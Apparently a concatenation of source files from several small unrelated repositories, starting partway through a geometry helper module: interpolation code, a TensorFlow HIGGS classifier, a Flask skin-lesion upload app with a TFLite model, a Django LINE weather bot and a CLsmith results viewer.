        bisector_dc_larger_angle = -1/bisector_dc_smaller_angle
    bisector_coefficient_larger_angle = intersection_point[1] - intersection_point[0]*bisector_dc_larger_angle
    larger_degree = smaller_degree+math.pi/2
    smaller_angle_biscetor = np.poly1d([bisector_dc_smaller_angle, bisector_coefficient_smaller_angle])
    larger_angle_bisector = np.poly1d([bisector_dc_larger_angle, bisector_coefficient_larger_angle])
    if which_one == 'smaller':
        return smaller_angle_biscetor
    else:
        return larger_angle_bisector
def movePointsByVector(points, vector):
    """Translate each point's x/y by vector[0]/vector[1].

    Output has the same shape as *points*; any columns beyond the first
    two come back zero-filled, matching the original behavior.
    """
    shifted = np.zeros((points.shape[0], points.shape[1]))
    shifted[:, 0] = points[:, 0] + vector[0]
    shifted[:, 1] = points[:, 1] + vector[1]
    return shifted
def turnPoint(points, angle):
    """Rotate every point about the origin by *angle* radians (counter-clockwise)."""
    rotated = np.zeros((points.shape[0], points.shape[1]))
    for idx in range(points.shape[0]):
        px, py = points[idx, 0], points[idx, 1]
        # Standard 2-D rotation matrix applied row by row.
        rotated[idx, 0] = (px*math.cos(angle)-py*math.sin(angle))
        rotated[idx, 1] = (px*math.sin(angle)+py*math.cos(angle))
    return rotated
def turnAroundPoint(points, degree, center_point):
    """Rotate *points* by *degree* radians about *center_point*.

    Same translate-rotate-translate pipeline as before, with the helper
    calls inlined: shift the center to the origin, rotate, shift back.
    Columns beyond x/y come back zero-filled, as in the original.
    """
    cx, cy = center_point[0], center_point[1]
    result = np.zeros((points.shape[0], points.shape[1]))
    for i in range(points.shape[0]):
        x = points[i, 0] - cx
        y = points[i, 1] - cy
        result[i, 0] = x*math.cos(degree) - y*math.sin(degree) + cx
        result[i, 1] = x*math.sin(degree) + y*math.cos(degree) + cy
    return result
--- FILE SEPARATOR ---
import numpy as np
from methods.equations_solver import linearCramerRoots
def linearInterpolation(x, y):
    """Return per-segment [slope, intercept] pairs for piecewise-linear interpolation."""
    segments = x.shape[0] - 1
    coefficients = np.empty((segments, 2))
    for k in range(segments):
        slope = (y[k+1]-y[k])/(x[k+1]-x[k])
        intercept = y[k] - x[k]*slope
        coefficients[k] = (slope, intercept)
    return coefficients
def quadraticInterpolation(x, y):
    """Return per-segment quadratic coefficients [a, b, c] for a C1 spline.

    Each segment passes through its two endpoints and matches the slope
    a0 carried over from the previous segment (the first slope is the
    secant of segment 0).  Fix: removed a leftover debug print of the
    3x3 system matrix that spammed stdout on every segment.
    """
    number_of_points = x.shape[0]
    coefficients = np.empty((number_of_points-1, 3))
    a0 = (y[1] - y[0]) / (x[1] - x[0])
    for i in range(0, number_of_points-1):
        # The derivative constraint is anchored at node i, except the
        # first segment which anchors it at node 1.
        if i == 0:
            n = 1
        else:
            n = i
        # Rows 0-1: the parabola passes through (x[i], y[i]) and (x[i+1], y[i+1]).
        A = np.empty((3, 3))
        for row in range(2):
            for column in range(3):
                A[row, column] = x[i + row*1] ** (2 - column)
        # Row 2: derivative 2*a*x[n] + b equals the carried-over slope a0.
        A[2, 0] = 2*x[n]
        A[2, 1] = 1
        A[2, 2] = 0
        B = np.array([[y[i]], [y[i+1]], [a0]])
        # Calculating Coefficients of quadratic functions
        coefficients[i] = linearCramerRoots(A, B)
        # Carry this segment's end slope into the next constraint.
        a0 = coefficients[i, 0]*2*x[i+1]+coefficients[i, 1]
    return coefficients
--- FILE SEPARATOR ---
import methods.geometrical_calculations as gc
import numpy as np
import matplotlib.pyplot as plt
import math
# Visual sanity check for the geometry helpers: build two lines from point
# triples, rotate the defining points by 90 degrees, and plot originals
# against the rotated results.
first_point = np.array([[0, 0], [1, 2], [2, 4]])
second_point = np.array([[-1, 10], [1, -10], [2, -20]])
fig = plt.figure(figsize=(10, 10))
linear_function_1 = gc.twoPointsLinearFunction(first_point[0, :], first_point[1, :])
linear_function_2 = gc.twoPointsLinearFunction(second_point[0, :], second_point[1, :])
x = np.linspace(-10, 10, 100)
plt.plot(x, linear_function_1(x), '+', x, linear_function_2(x), '+')
# bisectors = gc.averageDegreeBisectorEquation(linear_function_1, linear_function_2, 'larger')
# plt.plot(x, bisectors(x), color='b')
degree = math.pi/2
first_points_turned = gc.turnAroundPoint(first_point, degree, np.array([0, 0]))
second_points_turned = gc.turnAroundPoint(second_point, degree, np.array([0, 0]))
linear_function_3 = gc.twoPointsLinearFunction(first_points_turned[0, :], first_points_turned[1, :])
linear_function_4 = gc.twoPointsLinearFunction(second_points_turned[0, :], second_points_turned[1, :])
# Draw the coordinate axes in black.
plt.plot(x, np.zeros((x.shape[0],1)), color='k')
plt.plot(np.zeros((x.shape[0],1)), x, color='k')
plt.plot(x, linear_function_3(x), '-', x, linear_function_4(x), '-')
# Original points in black/red, rotated points in green/yellow.
plt.scatter(first_point[:, 0], first_point[:, 1], color="k")
plt.scatter(first_points_turned[:, 0], first_points_turned[:, 1], color="g")
plt.scatter(second_point[:, 0], second_point[:, 1], color="r")
plt.scatter(second_points_turned[:, 0], second_points_turned[:, 1], color="y")
plt.show()
|
[
"/main.py",
"/methods/equations_solver.py",
"/methods/excel_import.py",
"/methods/geometrical_calculations.py",
"/methods/interpolation.py",
"/testing/test.py"
] |
011235813/higgs_ml
|
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
import networks
import argparse
class Classifier():
    """Feed-forward classifier for the HIGGS dataset.

    Reads HIGGS.csv through a TF1 queue-based input pipeline and trains
    with Adam on a softmax cross-entropy loss.  Written for TensorFlow
    1.x (queues, placeholders, InteractiveSession) and Python 2 (print
    statements in main()).
    """
    def __init__(self, num_layers, nonlinearity1, nonlinearity2,
                 nonlinearity3, n_inputs, n_hidden1, n_hidden2,
                 n_hidden3, n_outputs, lr, batch_size,
                 input_file, log_dir, gpu, test_mode):
        # NOTE(review): `input_file` is accepted but the filename is
        # hard-coded below; num_layers other than 3 leaves self.y unset
        # (see create_network).
        self.filename = 'HIGGS.csv'
        self.file_length = 11000000  # total rows in the HIGGS csv
        self.lr = lr
        self.batch_size = batch_size
        self.log_dir = log_dir
        self.test_mode = test_mode
        # Map CLI strings to activation functions.
        self.map_str_nonlinearity = {'relu':tf.nn.relu, 'tanh':tf.nn.tanh}
        self.examples, self.labels = self.input_pipeline()
        self.create_network(num_layers, nonlinearity1, nonlinearity2,
                            nonlinearity3, n_inputs, n_hidden1,
                            n_hidden2, n_hidden3, n_outputs)
        # TODO: need to create test set
        if not self.test_mode:
            self.train_op = self.create_training_method()
        # for recording the entire network weights
        self.saver = tf.train.Saver()
        if gpu:
            session_config = tf.ConfigProto(allow_soft_placement=True,
                                            log_device_placement=True)
            session_config.gpu_options.allow_growth = True
            self.session = tf.InteractiveSession(config=session_config)
        else:
            self.session = tf.InteractiveSession()
        self.session.run(tf.global_variables_initializer())

    def create_network(self, num_layers, nonlinearity1, nonlinearity2,
                       nonlinearity3, n_inputs, n_hidden1,
                       n_hidden2, n_hidden3, n_outputs):
        """Build the forward graph; only num_layers == 3 is implemented."""
        #self.vec_input = tf.placeholder(dtype=tf.float64,
        #                                shape=[None, n_inputs],
        #                                name='vec_input')
        self.is_train = tf.placeholder(dtype=tf.bool,
                                       name='is_train')
        if num_layers == 3:
            self.y = networks.hidden3_bn(self.examples, n_hidden1,
                                         n_hidden2, n_hidden3,
                                         n_outputs, self.map_str_nonlinearity[nonlinearity3], self.is_train)

    def read_from_csv(self, filename_queue):
        """Parse one CSV row: column 0 is the label, columns 1-28 the features."""
        reader = tf.TextLineReader(skip_header_lines=0)
        key, value = reader.read(filename_queue)
        record_defaults = [[0.0]] * 29
        columns = tf.decode_csv(value, record_defaults)
        features = tf.stack(columns[1:])
        label = tf.stack(columns[0:1])
        return features, label

    def input_pipeline(self, num_epochs=None):
        """Queue-based shuffled-batch pipeline over the csv file."""
        filename_queue = tf.train.string_input_producer([self.filename])
        example, label = self.read_from_csv(filename_queue)
        min_after_dequeue = 10000
        capacity = min_after_dequeue + 3 * self.batch_size
        example_batch, label_batch = tf.train.shuffle_batch(
            [example, label], batch_size=self.batch_size,
            capacity=capacity,
            min_after_dequeue=min_after_dequeue)
        label_batch_int = tf.squeeze(tf.cast(label_batch, dtype=tf.int32))
        return example_batch, label_batch_int

    def create_training_method(self):
        """Define accuracy/loss ops and return the Adam train op."""
        with tf.name_scope('accuracy'):
            accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.cast(tf.round(self.y),dtype=tf.int32), self.labels), dtype=tf.float32))
        with tf.name_scope('loss'):
            loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.labels, logits=self.y))
        # Run batch-norm moving-average updates alongside each train step.
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        with tf.control_dependencies(update_ops):
            train_op = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(loss)
        return train_op

    def main(self):
        """Start queue runners and pull a few example batches (debug loop)."""
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(coord=coord)
        count = 0
        try:
            # while not coord.should_stop():
            while count < 3:
                example_batch, label_batch = self.session.run([self.examples,self.labels])
                print 'Examples', example_batch
                print 'Labels', label_batch
                # self.session.run(self.train_op)
                count += 1
        except tf.errors.OutOfRangeError:
            print("Done training")
            print count
        finally:
            # Always shut the queue threads down and close the session.
            coord.request_stop()
            coord.join(threads)
            self.session.close()
if __name__ == "__main__":
    # Command-line interface: network shape, training hyperparameters and
    # runtime flags.
    parser = argparse.ArgumentParser()
    parser.add_argument("--num_layers", default=1,
                        type=int, choices=[1,2,3],
                        help="number of hidden layers")
    parser.add_argument("--nonlinearity1", default='relu',
                        type=str, help="nonlinear function for hidden layer 1")
    parser.add_argument("--nonlinearity2", default='relu',
                        type=str, help="nonlinear function for hidden layer 2")
    parser.add_argument("--nonlinearity3", default='relu',
                        type=str, help="nonlinear function for hidden layer 3. If three layers, then nonlinearity for first two layers is fixed as relu")
    parser.add_argument("--n_inputs", default=28,
                        type=int, help="dimension of input layer")
    parser.add_argument("--n_hidden1", default=128,
                        type=int, help="width of hidden layer 1")
    parser.add_argument("--n_hidden2", default=128,
                        type=int, help="width of hidden layer 2")
    parser.add_argument("--n_hidden3", default=128,
                        type=int, help="width of hidden layer 3")
    parser.add_argument("--lr", default=1e-3,
                        type=float, help="optimizer learning rate")
    parser.add_argument("--batch_size", default=64,
                        type=int, help="batch size")
    parser.add_argument("--input_file", default='HIGGS.csv',
                        type=str, help="location to save network, tensorboard and results")
    parser.add_argument("--log_dir", default=None,
                        type=str, help="location to save network, tensorboard and results")
    parser.add_argument("--gpu", action="store_true",
                        help="if flag is set, then configures tensorflow session for GPU")
    parser.add_argument("--test", action="store_true",
                        help="if flag is set, then reads network from log_dir and tests on test data")
    args = parser.parse_args()
    # n_outputs is fixed at 1 (single signal/background score).
    c = Classifier(args.num_layers, args.nonlinearity1,
                   args.nonlinearity2, args.nonlinearity3,
                   args.n_inputs, args.n_hidden1, args.n_hidden2,
                   args.n_hidden3, 1, args.lr, args.batch_size,
                   args.input_file, args.log_dir, args.gpu, args.test)
    c.main()
--- FILE SEPARATOR ---
import tensorflow as tf
import numpy as np
def batch_normalized_linear_layer(vec_input, num_nodes, nonlinearity,
                                  is_train, scope):
    """Fully-connected layer followed by batch norm, then an activation.

    Args:
        vec_input: input tensor fed to the dense layer.
        num_nodes: width of the layer (number of output units).
        nonlinearity: activation callable, or None for a linear output.
        is_train: flag/tensor; batch norm uses batch statistics when true.
        scope: variable-scope name wrapping the layer's variables.

    Returns:
        The activated, batch-normalized layer output tensor.
    """
    # None is a singleton: identity comparison is the correct idiom (the
    # original used `== None`).
    if nonlinearity is None:
        nonlinearity = tf.identity
    with tf.variable_scope(scope):
        x = tf.contrib.layers.fully_connected(inputs=vec_input,
                                              num_outputs=num_nodes,
                                              activation_fn=None,
                                              scope='dense')
        y = tf.contrib.layers.batch_norm(inputs=x, center=True,
                                         scale=True,
                                         is_training=is_train, scope='bn')
    # Activation applied outside the scope, exactly as before.
    return nonlinearity(y)
def linear_layer(vec_input, num_nodes, nonlinearity, scope):
    """Plain fully-connected layer with an optional activation.

    Args:
        vec_input: input tensor fed to the dense layer.
        num_nodes: width of the layer.
        nonlinearity: activation callable, or None for a linear output.
        scope: variable-scope name wrapping the layer's variables.

    Returns:
        The layer output tensor.
    """
    # `is None`, not `== None` — None is a singleton.
    if nonlinearity is None:
        nonlinearity = tf.identity
    with tf.variable_scope(scope):
        h = tf.contrib.layers.fully_connected(inputs=vec_input,
                                              num_outputs=num_nodes,
                                              activation_fn=nonlinearity)
    return h
--- FILE SEPARATOR ---
import tensorflow as tf
from layers import *
def hidden3_bn(vec_input, n_hidden1, n_hidden2, n_hidden3, n_outputs,
               nonlinearity3, is_train):
    """Three batch-normalized hidden layers plus a linear output layer.

    The first two hidden layers use ReLU; the third uses *nonlinearity3*.
    Layer scopes are 'fc1', 'fc2', 'fc3' and 'out', matching the original.
    """
    widths = (n_hidden1, n_hidden2, n_hidden3)
    activations = (tf.nn.relu, tf.nn.relu, nonlinearity3)
    layer = vec_input
    for idx, (width, act) in enumerate(zip(widths, activations), start=1):
        layer = batch_normalized_linear_layer(vec_input=layer,
                                              num_nodes=width,
                                              nonlinearity=act,
                                              is_train=is_train,
                                              scope='fc%d' % idx)
    return linear_layer(vec_input=layer, num_nodes=n_outputs,
                        nonlinearity=None, scope='out')
|
[
"/classifier.py",
"/layers.py",
"/networks.py"
] |
01234567j/ucsd-ext-put-final
|
# counter.py
def inc(x):
    """Return *x* increased by one.

    >>> inc(4)
    5
    """
    return 1 + x
def dec(x):
    """Return *x* reduced by one.

    >>> dec(5)
    4
    """
    result = x - 1
    return result
--- FILE SEPARATOR ---
import counter
import pytest
def test_counter_inc():
    """inc() adds exactly one to its argument."""
    expected = 5
    assert counter.inc(4) == expected
def test_counter_dec():
    """dec() subtracts exactly one from its argument."""
    expected = 4
    assert counter.dec(5) == expected
|
[
"/counter.py",
"/test_counter.py"
] |
0124hitesh/Skin-Cancer-Detection
|
import os
from flask import Flask, request, render_template, send_from_directory, redirect, url_for, flash, jsonify
from PIL import Image
import datetime
import re
import base64
from flask_cors import CORS
from io import BytesIO
from predict_model import predict
# Flask application; CORS is enabled so the JSON endpoint (/upload1) can be
# called from other origins.
app = Flask(__name__)
# app = Flask(__name__, static_folder="images")
CORS(app)
# NOTE(review): hard-coded secret key — acceptable for a demo, should come
# from the environment in a real deployment.
app.config['SECRET_KEY'] = "myspecial"
# Absolute directory of this file; uploads are stored under <APP_ROOT>/images/.
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
def base64_to_image(base64_str, image_path=None):
    """Decode a (possibly data-URI-prefixed) base64 string into a PIL image.

    If *image_path* is given, the decoded image is also saved there.
    Returns the PIL Image object.
    """
    payload = re.sub('^data:image/.+;base64,', '', base64_str)
    img = Image.open(BytesIO(base64.b64decode(payload)))
    if image_path:
        img.save(image_path)
    return img
@app.errorhandler(404)
def not_found(e):
    """Render the custom 404 page for unknown routes."""
    page = render_template("404.html")
    return page
@app.route("/")
def index():
    """Landing page: the upload form."""
    page = render_template("upload.html")
    return page
@app.route("/upload", methods=["POST","GET"])
def upload():
    """Handle a browser file upload, classify it, and render the result.

    GET requests are bounced back to the index page; POST requests must
    carry a multipart "file" field.  The file is stored under images/ with
    a timestamped name, passed to predict(), and the prediction rendered.
    """
    if request.method == 'GET':
        flash("this method is not allowed","error")
        return redirect(url_for('index'))
    target = os.path.join(APP_ROOT, 'images/')
    print(target)
    # Create the upload directory on first use.  exist_ok avoids the race
    # and the misleading "Couldn't create" message the old code printed
    # whenever the directory already existed.
    os.makedirs(target, exist_ok=True)
    print("\n\n>>",request.files.getlist("file"),"<<\n\n")
    uploaded_file = request.files.getlist("file")[0]
    print(">>>",uploaded_file.filename)
    if uploaded_file.filename == '':
        flash("invalid file","error")
        return redirect(url_for("index"))
    print("{} is the file name".format(uploaded_file.filename))
    filename = uploaded_file.filename
    # Name the stored copy by upload time so repeat uploads never collide;
    # keep the original extension.
    time = str(datetime.datetime.today().strftime('%H-%M-%S'))
    date = str(datetime.date.today())
    extension = os.path.splitext(filename)[1]
    new_file_name = time + "_" + date + extension
    destination = "/".join([target, new_file_name])
    print ("Accept incoming file:", filename)
    print ("Save it to:", destination)
    uploaded_file.save(destination)
    print("\n\n\n---------",destination)
    ans = predict(destination)
    print("\n\n\n",ans,"\n\n\n")
    return render_template("complete_display_image.html", image_name=new_file_name, ans = ans)
@app.route('/upload/<filename>')
def send_image(filename):
    """Serve a previously uploaded image from the images/ directory."""
    image_response = send_from_directory("images", filename)
    return image_response
@app.route('/gallery')
def get_gallery():
    """List every stored upload and render them as a gallery page."""
    stored = os.listdir('./images')
    print(stored)
    return render_template("gallery.html", image_names=stored)
# @app.route('/result/<filename>')
# def show_result(filename):
# image_name = filename
# print("filename",filename)
# return render_template("complete_display_image.html",image_name = image_name)
@app.route("/upload1", methods=["POST","GET"])
def process_image1():
    """JSON twin of /upload: accept a base64 image, return the prediction.

    Expects a form field "image" holding a (possibly data-URI-prefixed)
    base64 string.  The decoded image is stored under images/ with a
    timestamped name and classified with predict().
    """
    if request.method == 'GET':
        return jsonify({"ans" : "this method is not allowed"}),405
    # Renamed from `file` (shadowed the builtin).
    encoded = request.form['image']
    if encoded == 'null':
        return jsonify({"ans" : "image is not valid"})
    target = os.path.join(APP_ROOT, 'images/')
    print("\n\n target",target,"\n\n")
    # exist_ok replaces the old isdir/mkdir dance, whose else-branch printed
    # a spurious "Couldn't create" message when the directory already existed.
    os.makedirs(target, exist_ok=True)
    time = str(datetime.datetime.today().strftime('%H-%M-%S'))
    date = str(datetime.date.today())
    file_name = time + "_" + date + '.jpg'
    destination = "/".join([target,file_name])
    # Decode and persist; the returned PIL image itself is not needed here.
    base64_to_image(encoded, destination)
    ans = predict(destination)
    return jsonify({"ans" : ans})
if __name__ == "__main__":
    # Development server only; use a proper WSGI server in production.
    app.run(port=4555, debug=True)
--- FILE SEPARATOR ---
import os
import numpy as np
from PIL import Image
import tensorflow as tf
from tensorflow import keras
# Load the TFLite model once at import time and pre-allocate its tensors so
# each predict() call only has to set inputs and invoke.
interpreter = tf.lite.Interpreter(model_path='./model.tflite')
interpreter.allocate_tensors()
# Read an image file into an RGB numpy array.
read = lambda imname: np.asarray(Image.open(imname).convert("RGB"))
print("\n\n\n","inside predict","\n\n\n")
def predict(imag_name):
    """Classify the image at *imag_name* as "benign" or "malignant".

    Side effect: the file is resized to 224x224 in place (the resized copy
    overwrites the original on disk) before being fed to the model.

    Args:
        imag_name: path to the image file to classify.

    Returns:
        "benign" or "malignant".
    """
    image = Image.open(imag_name)
    resized_im = image.resize((224,224))
    resized_im.save(imag_name)
    # Batch of one normalized float32 RGB image.
    img_1 = np.array([read(imag_name)], dtype='float32')
    img_2 = img_1/255
    input_details = interpreter.get_input_details()
    output_details = interpreter.get_output_details()
    # The old code also allocated an unused random input tensor here on
    # every call; that dead code is removed.
    interpreter.set_tensor(input_details[0]['index'], img_2)
    interpreter.invoke()
    # get_tensor() returns a copy of the output; argmax picks the class.
    a = interpreter.get_tensor(output_details[0]['index'])
    a = np.argmax(a, axis = 1)[0]
    return "benign" if a == 0 else "malignant"
|
[
"/app.py",
"/predict_model.py"
] |
0140454/weather-bot
|
from django.conf import settings
import apiai
import json
def intent_parser(input):
    """Send *input* to API.AI and return the parsed JSON intent response."""
    ai_client = apiai.ApiAI(settings.API_AI_CLIENT_ACCESS_TOKEN)
    text_query = ai_client.text_request()
    text_query.query = input
    raw = text_query.getresponse().read()
    return json.loads(raw.decode())
if __name__ == '__main__':
    # Manual smoke test: a few Mandarin weather queries against the live API.
    print(intent_parser('今天屏東天氣怎樣'))
    print(intent_parser('高雄天氣好嗎'))
    print(intent_parser('快告訴我台南的天氣'))
    print(intent_parser('跟我說說臺北的天氣'))
--- FILE SEPARATOR ---
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden
from django.views.decorators.csrf import csrf_exempt
from linebot import LineBotApi, WebhookParser
from linebot.exceptions import InvalidSignatureError, LineBotApiError
from linebot.models import MessageEvent, TextMessage, TextSendMessage
from .weather import get_current_weather
from .api_ai import intent_parser
# Module-level LINE clients, created once per process from the configured
# channel credentials.
line_bot_api = LineBotApi(settings.LINE_CHANNEL_ACCESS_TOKEN)
parser = WebhookParser(settings.LINE_CHANNEL_SECRET)
@csrf_exempt
def callback(request):
    """LINE webhook endpoint.

    Verifies the webhook signature, parses the events, and for each text
    message replies with the weather of the city extracted by API.AI, or a
    fallback/echo when the intent is unknown.  Non-POST requests get a 400.
    """
    DEFAULT_LOCATION = '臺南市'
    if request.method == 'POST':
        signature = request.META['HTTP_X_LINE_SIGNATURE']
        body = request.body.decode('utf-8')
        try:
            events = parser.parse(body, signature)
        except InvalidSignatureError:
            # Signature does not match the channel secret: reject.
            return HttpResponseForbidden()
        except LineBotApiError:
            return HttpResponseBadRequest()
        for event in events:
            if isinstance(event, MessageEvent):
                if isinstance(event.message, TextMessage):
                    intent = intent_parser(event.message.text)
                    if intent['result']['action'] == 'input.unknown':
                        # No city recognised: if the user still asked about
                        # weather ('天氣'), fall back to the default city;
                        # otherwise echo the message back unchanged.
                        if '天氣' in event.message.text:
                            response = '目前無法理解您要查詢哪一個城市。\n' \
                                       '以下將替您查詢%s的天氣。\n\n' \
                                       '%s' % (DEFAULT_LOCATION, get_current_weather(DEFAULT_LOCATION))
                        else:
                            response = event.message.text
                    else:
                        # Intent recognised: look up the extracted city,
                        # defaulting when API.AI returned an empty value.
                        place = intent['result']['parameters']['taiwan-city']
                        if len(place) == 0:
                            place = DEFAULT_LOCATION
                        response = get_current_weather(place)
                    line_bot_api.reply_message(
                        event.reply_token,
                        TextSendMessage(text = response)
                    )
        return HttpResponse()
    else:
        return HttpResponseBadRequest()
--- FILE SEPARATOR ---
from django.conf import settings
import xml.etree.ElementTree as ET
import urllib.request
def get_current_weather(city):
    """
    Get current weather in specific city.

    Fetches the CWB F-C0032-001 open-data XML feed and returns a formatted
    (Chinese) weather summary for the first location whose name contains
    *city*, or an apology string when no location matches.

    Args:
        city: City Name
    Returns:
        Current weather string
    """
    response = urllib.request.urlopen('http://opendata.cwb.gov.tw/opendataapi?dataid=F-C0032-001&authorizationkey=%s' % settings.CWB_AUTHED_KEY)
    tree = ET.parse(response).getroot()
    for location in tree.findall('.//{urn:cwb:gov:tw:cwbcommon:0.1}location'):
        if city in location[0].text:
            # If the city is found, access its child direct.
            # NOTE(review): the positional indexes below assume a fixed
            # element order inside each <location> of the F-C0032-001 feed;
            # verify against the feed schema before changing them.
            return '%s目前的天氣為%s。\n' \
                   '溫度為 %s 至 %s ℃,降雨機率為 %s %%。' \
                   % (location[0].text, location[1][1][2][0].text,
                      location[3][1][2][0].text, location[2][1][2][0].text,
                      location[5][1][2][0].text)
    return '很抱歉,無法提供您該城市的天氣。'
if __name__ == '__main__':
    # Manual smoke test against the live CWB feed.
    print(get_current_weather('臺南'))
|
[
"/service/api_ai.py",
"/service/views.py",
"/service/weather.py"
] |
0152la/CLsmithResultViewer
|
import re
# Matches when the first character is NOT hex-ish ([0-9a-fx]) — i.e. the
# stored "result" is an error/diagnostic message rather than a numeric value.
numeric_value = re.compile(r'[^0-9a-fx]')
def FilterMatching(sample, contents, target, filter_fails = False):
    """Return programs whose *target*-platform result disagrees with the
    majority sample.

    When *filter_fails* is set, programs whose target result is not a
    numeric value (per the module-level `numeric_value` regex) are skipped.
    The result is sorted.
    """
    mismatched = [
        prog for prog in sample
        if sample[prog] != contents[prog][target]
        and not (filter_fails and bool(numeric_value.match(contents[prog][target])))
    ]
    return sorted(mismatched)
def FilterPlat(contents, target, filter_plat, filter_fails = False):
    """Return programs where platforms *target* and *filter_plat* disagree.

    When *filter_fails* is set, programs whose target result is not a
    numeric value (per the module-level `numeric_value` regex) are skipped.
    The result is sorted.
    """
    differing = [
        prog for prog in contents
        if contents[prog][target] != contents[prog][filter_plat]
        and not (filter_fails and bool(numeric_value.match(contents[prog][target])))
    ]
    return sorted(differing)
--- FILE SEPARATOR ---
#!/usr/bin/python
import os
import glob
import collections
import re
def ParseData(location=None):
    """Read every *.csv result file in *location* and aggregate the results.

    Each csv holds one platform's results; program sections start with a
    "RESULTS FOR <prog>.cl (<no_lines>)" header followed by raw result
    lines.  Results are normalised to comma-joined 0x-prefixed values and
    a majority vote is computed per program.

    Args:
        location: directory containing the csv files.  Defaults to the
            current working directory at *call* time — the old default
            `location=os.getcwd()` was evaluated once at import time.

    Returns:
        (sample, contents, line_nos): sample maps program -> majority
        result (or "Inconclusive"); contents maps program -> platform ->
        normalised result string; line_nos maps program -> line count.

    Side effect: chdir()s into *location*.
    """
    if location is None:
        location = os.getcwd()
    os.chdir(location)
    files = glob.glob("*.csv")
    numeric_value = re.compile(r'[^0-9a-fx]')
    votes_min = 3
    raw_contents = dict()
    contents = dict()
    line_nos = dict()
    # Read raw contents from csv files.  with-blocks close the handles —
    # the old code leaked one file descriptor per platform.
    print("Reading results from files...")
    for filename in files:
        platform_name = ' '.join(filename.split('.')[0].split('_'))
        with open(filename, 'r') as csvfile:
            lines = csvfile.read().splitlines()
        raw_contents[platform_name] = [s.strip() for s in filter(None, lines)]
    # Organize raw contents: group result lines under program/platform.
    print("Organizing raw results...")
    for platform in raw_contents:
        for line in raw_contents[platform]:
            # Expected line format: RESULTS FOR <prog_name>.cl (<no_lines>)
            if "RESULTS FOR" in line:
                program = line.split(" ")[2]
                if program not in contents:
                    contents[program] = dict()
                contents[program][platform] = []
                if program not in line_nos:
                    if "(" not in line:
                        continue
                    line_nos[program] = line.split("(")[1].split(")")[0]
            else:
                contents[program][platform].append(line)
    raw_contents.clear()
    # Parse numeric values to uniformly have 0x in the beginning.
    print("Making data uniform...")
    for program in contents:
        for platform in contents[program]:
            contents[program][platform] = "\n".join(sorted(contents[program][platform]))
            # A leading non-hex character means this entry is an error or
            # diagnostic blob, not a numeric result: leave it as-is.
            if bool(numeric_value.match(contents[program][platform])):
                continue
            parsed_value = []
            for result in contents[program][platform].split(","):
                result = result.strip()
                if not result:
                    continue
                if not result.startswith("0x"):
                    parsed_value.append("0x" + result)
                else:
                    parsed_value.append(result)
            contents[program][platform] = ",".join(sorted(parsed_value))
    # Find majority vote for each program.
    print("Computing majorities...")
    vote = dict()
    sample = dict()
    for program in contents:
        vote[program] = dict()
        for platform in contents[program]:
            curr_result = contents[program][platform]
            if not curr_result.startswith("0x"):
                continue
            # Count every occurrence.  The old code initialised the first
            # occurrence to 0, undercounting each candidate by one vote
            # against the votes_min threshold.
            vote[program][curr_result] = vote[program].get(curr_result, 0) + 1
        curr_max = 0
        curr_cand = []
        for candidate, votes in vote[program].items():
            if votes > curr_max:
                curr_max = votes
                curr_cand = [candidate]
            elif votes == curr_max:
                curr_cand.append(candidate)
        # A unique winner with at least votes_min agreeing platforms wins;
        # anything else is inconclusive.
        if len(curr_cand) != 1 or curr_max < votes_min:
            sample[program] = "Inconclusive"
        else:
            sample[program] = curr_cand[0]
        vote.clear()  # old code had `vote.clear` without parentheses (no-op)
    return sample, contents, line_nos
--- FILE SEPARATOR ---
def OutputHTML(prog_list, sample, contents, *extra):
    """Placeholder for HTML report generation.

    Accepts (and ignores) extra positional arguments because the caller in
    showresults.py currently passes four arguments (plat_list first, then
    prog_list, sample, contents); the original three-parameter signature
    made that call raise TypeError.
    """
    print("hi")
--- FILE SEPARATOR ---
#!/usr/bin/python
from loadresults import ParseData
import filterresults
import outputresults
import os
import subprocess
from kivy.app import App
from kivy.config import Config
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.dropdown import DropDown
from kivy.uix.carousel import Carousel
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import ScreenManager, Screen
# Initial window size in pixels (strings, as kivy's Config.set expects).
height = "533"
width = "1000"
class Browser(Screen):
    """First screen: lets the user pick the directory holding result csvs."""
    # Widgets bound from the kv file.
    dir_box = ObjectProperty(None)
    file_chooser = ObjectProperty(None)
    def SelectDir(self):
        """Mirror the file chooser's selection (or path) into the text box."""
        chosen = self.file_chooser.selection
        if not chosen:
            self.dir_box.text = self.file_chooser.path
        elif chosen[0] != "../":
            self.dir_box.text = chosen[0]
    def ChooseDir(self):
        """Create the Analyzer screen for the chosen directory and show it."""
        analyzer_instance = Analyzer(name="analyzer")
        self.manager.add_widget(analyzer_instance)
        self.manager.current = "analyzer"
        self.manager.current_screen.Initialize(self.dir_box.text)
class Analyzer(Screen):
    """Main results screen: browse per-program results across platforms.

    Populated by Initialize() after the user picks a directory in Browser.
    NOTE(review): uses a Python 2 dict API (`itervalues().next()`); this
    class will not run unmodified under Python 3.
    """
    # Widgets bound from the kv file.
    plat_btn = ObjectProperty(None)
    filter_btn = ObjectProperty(None)
    prog_ipt = ObjectProperty(None)
    result_view = ObjectProperty(None)
    # Parsed data from loadresults.ParseData().
    sample = dict()
    contents = dict()
    line_nos = dict()
    # Navigation state: index into prog_list of the program on display.
    curr_idx = 0
    prog_list = []
    plat_list = []
    # Result widgets, created lazily by SetResults().
    res_ipt = ObjectProperty(None)
    res_dff = ObjectProperty(None)
    res_cmp = ObjectProperty(None)
    res_plt = ""
    res_slt = ObjectProperty(None)
    cnt_lbl = ObjectProperty(None)
    def Initialize(self, path):
        """Parse the csv results in *path* and build the two dropdowns."""
        self.sample, self.contents, self.line_nos = ParseData(path)
        platforms = DropDown()
        # Platform names are taken from any one program's result dict.
        for platform in sorted(self.contents.itervalues().next().keys()):
            btn = Button(text = platform, size_hint_y = None, height = 33)
            btn.bind(on_release = lambda btn: self.SetPlatform(btn.text, platforms))
            platforms.add_widget(btn)
